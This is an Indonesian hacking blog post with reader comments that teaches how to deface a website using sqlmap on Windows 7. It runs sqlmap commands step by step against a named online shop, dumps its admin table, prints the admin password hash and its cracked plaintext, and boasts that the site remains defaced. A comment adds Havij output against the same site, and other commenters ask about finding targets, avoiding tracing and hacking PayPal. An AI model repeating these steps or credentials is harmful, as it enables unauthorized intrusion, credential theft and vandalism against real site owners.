Deface Dengan SQLMAP di WINDOWS 7

Bimo 8:52 AM

Assalamualaikum Wr, WB,

maaf yah om om sekalian, ane lama gak buat threat baru, nah sekarang mumpung ada waktu ane share nih cara deface website dengan SQLMAP di Backtrack 5 :D

Apa itu SQLMap ?


SQLMAP adalah penetrasi open source pengujian alat yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan SQL injection dan mengambil alih server database.
Sekarang tanpa basa-basi lagi kita mulai injeksi dengan sqlmap.

[+] BAHAN [+]

[+] LANGKAHNYA MBAH BRO [+]

Untuk mengetahui website yang kalian mau Inject itu Vuln atau tidak , silahkan kasih tanda ( ' ) di akhir  url target, contoh : http://vana-shop.com/product.php?c=1 saya tambahin ' menjadi

  • http://vana-shop.com/product.php?c=1' , nah kalo vuln nanti ada tulisan "you have an erro ...." mysql error dan sebagainya"

sekarang waktunya di hajar kalo udah ketemu web yang vuln :P

1. Setelah instal python, sekarang kalian extrack SQLMAPnya di Drive C:, setelah di extrack buka CMD lalu ketikan :

2. Stelah itu, kalian mulailah scan website target dengan perintah :
  • sqlmap.py -u http://www.BUGWEBTARGET.com --dbs
Contoh Target : sqlmap.py -u http://vana-shop.com/product.php?c=1 --dbs , klik [ENTER]


3. Tuh kan keliatan DATABASE nya :D , sekarang waktunya kita scan dengan perintah :
Contoh Target : sqlmap.py -u http://vana-shop.com/product.php?c=1 -D k4735093_vnsh099 --tables , maka hasilnya akan seperti ini :


4. Nah keliatan kan Table di databasenya ? nah sekarang kita scan table tersebut (*cari yang menurut kalian terdapat info tentang user dan pass website) kalo udah yakin disana ada infonya, ketikan perintah :
  • sqlmap.py -u http://www.TARGETWEBSITE.com -D nama_database -T nama_table --columns
Contoh Target : sqlmap.py -u http://www.vana-shop.com/product.php?c=1 -D k4735093_vnsh099 -T user --columns , tekan enter maka hasilnya akan seperti ini :


5. Nah setelah keliatan Tabelnya sekarang kita ketikan perintah :
  • sqlmap.py -u http://www.target.com -D nama_database -T nama_table --dump
Contoh Target : sqlmap.py -u http://www.vana-shop.com/product.php?c=1 -D k4735093_vnsh099 -T user --dump , klik enter 

 Jika muncul tulisan seperti ini, ketik "n" lalu tekan enter "tanpa tanda kutip" :
  • do you want to crack them via a dictionary-based attack? [Y/n/q] 
Maka Hasilnya akan seperti ini :




nah itu kita dapetin User + Passwordnya :D

User : admin
Pass : dfc560ef836a9a63c2bdbfb24a683624

Nah gimana tuh passwordnya kok aneh ? sekarang tugas kalian pecahin itu md5nya caranya pergi ke :


Nah setelah saya Decrypt ane dapetin nih :

Pass : dfc560ef836a9a63c2bdbfb24a683624 :: myluckyshop$

Sekarang tinggal login ke admin dan tebas deh :D


HASIL : 

masih kena deface tuh : http://www.vana-shop.com/

dah yah sekian dulu Postingnya, ane males ngetik lagi KWOKWOWK XD

Sama kan kayak make BACKTRACK 5 :D

Semoga berhasil :)

Content Creator : Bimo Septiawan a.k.a Cyber404






Tags:

Post a Comment

68 Comments

  1. AnonymousApril 24, 2013 at 9:34 AM

    itu ngga ada hapus jejak segala ya?
    apakah bisa dilacak?

    ReplyDelete
    Replies
    1. Problem ChildApril 24, 2013 at 3:27 PM

      alay lu.. emang kalo dilacak mau ngapain.. baca judulnya.. ini yg dibahas tentang sqlmap. bukan hapus jejak... !!!

      Delete
    2. BimoApril 25, 2013 at 2:26 AM

      kurang tau sob :D

      Delete
  2. Problem ChildApril 24, 2013 at 3:34 PM

    Havij 1.15 Pro!
    Analyzing http://vana-shop.com/product.php?c=1
    Host IP: 119.82.227.67
    Web Server: Apache
    Keyword Found: sangat
    Injection type is Integer
    DB Server: MySQL >=5
    Selected Column Count is 13
    Valid String Column is 3
    Current DB: k4735093_vnsh099
    Count(table_name) of information_schema.tables where table_schema=0x6B343733353039335F766E7368303939 is 9
    Tables found: category,contact,discount,discountdetail,homepage,products,promo,subcategory,user
    Count(column_name) of information_schema.columns where table_schema=0x6B343733353039335F766E7368303939 and table_name=0x75736572 is 4
    Columns found: userID,username,password,userlevel
    Count(*) of k4735093_vnsh099.user is 1
    Data Found: username,password,userlevel=admin^c07d0e92b5e39f2747a897ea5ad8e6aa^Administrator

    kelamaan. :v
    pake havij udah selesai cuma 1menit. :v

    ReplyDelete
    Replies
    1. BimoApril 25, 2013 at 2:27 AM

      gak semua bisa di tusbol make Havij :P

      Delete
    2. UnknownOctober 18, 2014 at 7:57 AM

      Havij 1.15 Pro!
      Analyzing http://vana-shop.com/product.php?c=1
      Host IP: 185.53.177.11
      Web Server: nginx
      Keyword Found: uiOptimize:
      Injection type is String (')
      Can't find db server type! But maybe there be some chances! [-o<
      Trying another method using keyword for finding columns count
      Selected Column Count is 3
      Retying to find string column
      Retying to find string column
      Retying to find string column
      Retying to find string column
      Retying to find string column
      Retying to find string column
      Cannot find string column!
      Testing for MySQL error based injection method
      MySQL error based injection method cant be used!
      Trying blind method
      Finding current data base
      It seems that target is not vulnerable. it's a false positive, Injection Failed!
      MsSQL time based injection method can't be used
      MySQL time based injection method can't be used

      [-(

      Delete
  3. Problem ChildApril 24, 2013 at 3:38 PM

    ada yang nyolong kek. http://shad0w-share.blogspot.com/2013/04/deface-dengan-sqlmap-di-windows-7.html

    ReplyDelete
    Replies
    1. AnonymousApril 24, 2013 at 7:52 PM

      ini yg manual ^^
      ga semua bug injek" havij bisa nembus :D

      Delete
    2. Problem ChildApril 26, 2013 at 8:13 PM

      Apa hubungan nya sama komen gue ?

      Delete
    3. UnknownOctober 18, 2014 at 8:06 AM

      siapa yang nyolong om ? artikelnya sama sama di buat di tanggal bulan dan tahun yang sama :-?

      Delete
  4. candraApril 24, 2013 at 7:00 PM

    gan gimana cara cari web targetnya ?

    ReplyDelete
  5. AnonymousApril 25, 2013 at 2:17 AM

    c07d0e92b5e39f2747a897ea5ad8e6aa *Ups :-)

    ReplyDelete
  6. AnonymousApril 25, 2013 at 3:14 AM

    alah blog cacad ini mah..deface tingkat newbie aja sok sok an loh..

    ReplyDelete
  7. AnonymousApril 25, 2013 at 3:16 AM

    ni mah blog nya bocah smp yah qwkakakakakak..

    ReplyDelete
  8. AnonymousApril 25, 2013 at 3:17 AM

    itu juga yang namanya BIMO ama ONIX AQUA KENCING KUDA orang aneh semua awkawoawkoawkoawko

    ReplyDelete
    Replies
    1. BimoApril 25, 2013 at 5:18 AM

      kencing kuda itu yang beraninya make ANONIM ngak pake akun :P

      Delete
    2. Onix AQuaApril 25, 2013 at 8:06 AM

      Bayi :p udh netek dulu sana :D

      Delete
  9. AnonymousApril 25, 2013 at 8:38 PM

    phythonnya banyak versi ya? aku jadi bingung. kalo yang buat windows 7 32 bit pake yang mana?

    ReplyDelete
  10. AnonymousApril 27, 2013 at 4:03 AM

    knp CMD gua kgak bisa \cd\sqlmap\ ??

    ReplyDelete
    Replies
    1. glow_heartApril 27, 2013 at 4:56 AM

      baca dulu om ...
      cmd om da d directori mna ...

      Delete
    2. BimoApril 27, 2013 at 4:56 AM

      buka 1 1 aja dulu bro :D

      cd \

      Delete
  11. glow_heartApril 27, 2013 at 5:00 AM

    sdkit koreksi om
    postingannya da slah ktik dkit d bgian lngkah k 3

    3. Tuh kan keliatan DATABASE nya :D , sekarang waktunya kita scan dengan perintah :

    sqlmap.py -u http://TARGET.com -D nama_database -tables

    sharusnya kn

    sqlmap.py -u http://TARGET.com -D nama_database --tables


    dkit aja ...
    tp kseluruhan isi postingannya top bnget ...

    ReplyDelete
    Replies
    1. asdApril 27, 2013 at 10:17 AM

      hehe kurang - satu :D

      maaf om :D

      makasih ^_^

      Delete
  12. AnonymousApril 27, 2013 at 8:23 AM


    ☺ Python [tonjok saya]
    ☺ Sqlmap [remas saya]
    aduh bang jangan remas - remas , msh pejaka bang .

    ./virus47

    ReplyDelete
  13. JaNzApril 27, 2013 at 12:05 PM

    Bang python nyamembingungkan nih ?
    Yang mna yg hrus didownload untuk W7 32 bit ?

    ReplyDelete
  14. AdhenrizkiApril 28, 2013 at 10:31 PM

    yng ngebingunin download python nya .. banyak versinya .. pilih yg mana jadinya ?? :3

    ReplyDelete
    Replies
    1. glow_heartApril 29, 2013 at 5:40 AM

      trserah ...
      kan sama aja ...
      cma beda versi doank ...

      Delete
  15. M. Ilham SyaputraMay 3, 2013 at 1:32 AM

    om.. kenapa setiap udah di enter ga keluar apa" dan malah python.exe stopped working.. pencerahan dong

    ReplyDelete
  16. AnonymousMay 9, 2013 at 10:51 AM

    itu extract sqlmap d C:pyhton ap d C: aja..trus kegunaan python ap kalo sqlmap ny d C: ?

    ReplyDelete
    Replies
    1. Onix AQuaMay 15, 2013 at 6:32 PM

      d C:\ aja,, gunanya python utk jalankn apliikasi yg dibuat dari bhsa python,, bysa berextensi .py

      cth: sqlmap.py

      Delete
  17. AnonymousMay 13, 2013 at 9:19 PM

    gan kenapa pas ane buka cmd trus ketik cd\sqlmap\ ada tulisan The System Cannot Find The Patch Specified tolong kak bimo [-(

    ReplyDelete
  18. CYBER GUNZMay 15, 2013 at 11:26 PM

    kok keluar gini y gan

    File "sqlmap\sqlmap.py\", line 92
    except exceptiontuple, e:

    syntac error


    mohon bimbingannya

    ReplyDelete
  19. UnknownMay 17, 2013 at 7:00 PM

    wkwkwkw berhasil gan wkwkwkw
    go hacking ;(( ;-( =p~ :d

    ReplyDelete
  20. Yoga PMay 24, 2013 at 10:55 PM

    gan, sqlmap nya ngak bisa di extrack di drive c; ,malah error ??? #dimasukin dimananya Sqlmap nya ??

    ReplyDelete
    Replies
    1. opick SmashDecember 10, 2013 at 4:37 AM

      Sqlmap nya di extrack di driver c: di Luarnya gan

      Delete
  21. Achmad SalehMay 27, 2013 at 2:47 AM

    acem dah kok malah syntaxt error

    ReplyDelete
  22. BroNyengMay 31, 2013 at 12:08 AM

    IP kita kebaca tidak kira2 gan?

    ReplyDelete
  23. AdminSeptember 23, 2013 at 7:48 PM

    wkwkwkwkwkw ....
    bukan bermaksud mennyinggung pembuat tread
    hanya lebih kepada para peng coment

    dari atas ampe bawah itu2 saja yang ditanya
    mbok ya dibiasakan budaya membaca sampai selesai dulu
    trus coba deh, kalo gagal dan udah mentok juga g ada di tutor ataupun di begian koment
    baru dah sisipin pertanyaan lu =))

    sorry ya min, miris aja liat budaya bertanya tanpa membaca keseluruhan (/\)

    ReplyDelete
  24. Pengurus FoundingSeptember 24, 2013 at 7:16 AM

    kenapa kok pas ngejalani langkah pertama ada tulisannya [EROR] all parameter is not injectable
    pada akhir .. !! kalo gg salah gtu tulisannya dan intinya saya tidak berhasil?
    dan hasilnya ane tidak dapet info database dari web @-)

    ReplyDelete
  25. UnknownsOctober 13, 2013 at 7:22 AM

    om klo pass nya kayak gini gimana decrypt nya, :-?
    $P$Bwqd3pFzDcPe4krOUm0lP7C82RTU2C0

    mohon om pencerahan nya ;((

    ReplyDelete
  26. UnknownNovember 17, 2013 at 12:15 PM

    kalo ane pratiin cara kerja Havij sama sqlmap hampir sama ...
    ini ngarti ini waktu masih asik"nye maen backtrack ...
    Kasus : Misal Web A terdetect vunl, kemudian di coba make havij kagak nembus, pake sqlmap bakal nembus kagak ya ....? mohoh penjelasannye singkat padat + tepat ye kang .. :)

    ReplyDelete
  27. rowleraincNovember 27, 2013 at 1:29 AM

    ane udh instal bahan nya tp ko ga jalan ya,apakah hanya support buat sistem 32bit aja, ane pake yg 64bit soalnya, mohon pencerahan nya donk :))

    ReplyDelete
  28. Merta TechnologyJanuary 13, 2014 at 2:41 AM

    773fd3d219a26228b40b8e083505afc6

    ReplyDelete
  29. UnknownJanuary 14, 2014 at 2:12 AM

    bang minta tolong dong bang crack ini code ane bingung nih newbie :'(

    26282ffe7c7822ecc43f2e77949488d2:fJke4Nc1x6OMvhe29EE3Fvejq5MAUjuS

    ReplyDelete
  30. adie_pratamaJanuary 27, 2014 at 5:38 AM

    msihh bingung cara buat mencahin kodenya bang, butuh titik terang nih (p) =))

    ReplyDelete
  31. AnonymousJanuary 29, 2014 at 12:31 AM

    kagak bisa tembusss..... ;-(

    ReplyDelete
  32. UnknownApril 6, 2014 at 8:45 AM

    bisa buat kalding donk berarti pak? :D
    Makacih Om (k)

    ReplyDelete
  33. UnknownApril 15, 2014 at 10:45 PM

    gan mau nanya, ane td ternyata ada salah nge scan salah satu table-_- nah untuk back gitu bisa gak biar ketampil lagi semua table nya? (seperti step 4)

    ReplyDelete
  34. AnonymousApril 24, 2014 at 2:26 AM

    Mantab om :) Dah Berhasil (y) Tapi Ngedump Nya kok lama ya :3 Apa emang gitu :3

    ReplyDelete
  35. UnknownMay 18, 2014 at 1:34 PM

    masa ane buka cmd terus nulis code cd\sqlmap\ malah ada tulisan gini om the system cannot find the path specified itu kenapa ya om mohon bantuan nya , makasih

    ReplyDelete
  36. UnknownJune 4, 2014 at 1:23 AM

    gan kalau mau hacking PAYPAL GMNA ? pkai sql map ?? ;(( ;-(

    ReplyDelete
  37. Bima Hardi AntoOctober 24, 2014 at 9:06 AM

    gan kenape ane pas sqlmap.py -u http://vana-shop.com/product.php?c=1 --dbs ane enter kok tulisannya gini
    sqlmap: error: missing a mandatory parameter <'-d', '-u', '-l' blablabla, '--wizard' or '--update'>, -h for help
    press enter to continue
    ane enter tp malah berhenti, hmna gan help

    ReplyDelete
  38. UnknownNovember 27, 2014 at 12:57 AM

    banyak cara lg gan, pinter pinter kita aja ngembanginnya,

    ReplyDelete
  39. UnknownNovember 27, 2014 at 1:00 AM

    sukses gan, banyak cara lg gan, pinter2 kita aja ngembanginnya

    ReplyDelete
  40. WINNR COMUSeptember 30, 2015 at 2:52 PM

    mayan daripada manyun ;)

    ReplyDelete
  41. AnshorJuly 30, 2016 at 12:08 AM

    Bang cara tahu url loginnya gimana ??? :-b

    ReplyDelete